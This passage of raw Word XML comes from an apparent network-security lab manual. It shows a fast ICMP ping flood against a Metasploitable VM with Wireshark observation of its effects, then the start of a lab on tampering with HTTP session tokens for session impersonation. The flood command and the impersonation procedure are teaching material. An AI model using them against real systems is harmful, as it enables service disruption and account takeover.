          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0.01 </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Metasploitable_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5174BE0B" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204"/>
        <w:ind w:left="503"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This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sends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packets </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>very fast</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>similar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proofErr w:type="gramEnd"/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flooding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AB93C7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7F50DC5B" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="131"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C228F8F" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E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10: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Capture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Traffic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During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Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EA4E92" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="14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Start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new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capture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Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD506EA" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1167"/>
        </w:tabs>
        <w:ind w:left="1167" w:hanging="359"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Let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run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20–30</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="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seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56770A9C" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="14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 xml:space="preserve">Stop </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDEE714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1553AD08" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="130"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4621B950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11:</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-1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Analyze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DoS-Like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Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CF0EC0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In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Wireshark,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observe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2075A9AD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ind w:left="1168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Very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high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packet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count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFB2817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Packets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arriving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extremely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fast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3DD6D2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spacing w:line="417" w:lineRule="auto"/>
        <w:ind w:right="6598" w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Congested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traffic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flow Apply filter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2166EF50" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="exact"/>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>icmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04F78C4F" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="202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Observation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CE67AD" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E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Packet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rate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very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high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appears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congested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346C1B6F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32654505" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="132"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7215A688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12: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Observe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Impact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on</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="43A2A7D1" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="205" w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="7266"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>On</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-15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z w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: ping &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kali_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Observe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520CD2DE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spacing w:before="0" w:line="273" w:lineRule="exact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Delay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replies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51027599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Packet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loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66665E73" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs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Slow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response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD5EBF2" w14:textId="77777777" w:rsidR="0061574E" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC9945B" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:spacing w:before="6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PART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C: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Understanding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Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4D410C" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C548F8" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="133"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="788D233D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13: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Compare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Normal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vs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DoS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Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598DD07F" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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2"/>
        <w:gridCol w:w="2011"/>
      </w:tblGrid>
      <w:tr w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w14:paraId="114D92CD" w14:textId="77777777" w:rsidTr="00F61DE6">
        <w:trPr>
          <w:trHeight w:val="527"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1972" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3084835C" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00F61DE6">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="23"/>
              <w:ind w:left="27"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Normal</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13D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ED13DB">
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2011" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66B0377D" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00F61DE6">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="23"/>
              <w:ind w:left="27"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>DoS-Like</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13D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ED13DB">
              <w:rPr>
                <w:b/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w14:paraId="1A45B3BF" w14:textId="77777777" w:rsidTr="00F61DE6">
        <w:trPr>
          <w:trHeight w:val="529"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1972" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68057486" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00F61DE6">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="25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Slow</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:spacing w:val="-3"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>packets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2011" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34541F68" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00F61DE6">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="25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Very</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:spacing w:val="-15"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>fast</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:spacing w:val="-14"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>packets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w14:paraId="2B9BA3C0" w14:textId="77777777" w:rsidTr="00F61DE6">
        <w:trPr>
          <w:trHeight w:val="531"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1972" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F0D6D7D" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00F61DE6">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="25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Stable</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:spacing w:val="-3"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2011" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="412E6313" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00F61DE6">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="25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Delayed</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:spacing w:val="-6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w14:paraId="1494EC18" w14:textId="77777777" w:rsidTr="00F61DE6">
        <w:trPr>
          <w:trHeight w:val="528"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1972" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CE5BA0B" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00F61DE6">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="22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Low</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:spacing w:val="-3"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>bandwidth</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2011" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="641F01CC" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00F61DE6">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="22"/>
              <w:ind w:left="27"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">bandwidth </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED13DB">
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3032074C" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="205"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A4EB964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14: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All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Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092AEF73" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr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Press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CTRL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+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stop </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F359D86" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr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E9157E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6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EA4742" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80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74BC8990" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="448" w:right="511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Intercepting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Modifying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HTTP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Requests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using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Tamper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Data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and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Demonstrating Session Impersonation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF64A4D" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="268D68E1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Aim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FD51CA" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="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install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use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Tamper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Data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Firefox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intercept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modify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HTTP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requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263761E4" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:ind w:left="1168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demonstrate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session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impersonation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by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editing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session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token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or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value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B32173" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="2" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="1168" w:right="758"/>
        <w:rPr>
          <w:b/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understand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risks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weak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session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management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significance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strong security controls</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34170667" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48C4C43E" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000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Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA96600" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="276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Open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Firefox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(Legacy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Version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BAE1EB" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12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Launch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Firefox (version 56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or</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> below)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C79DEFE" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12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Ensure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internet </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6CA251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649BFAEE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Install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Tamper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Data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Extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF65FD1" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Tools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Add-</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC6A938" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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 xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
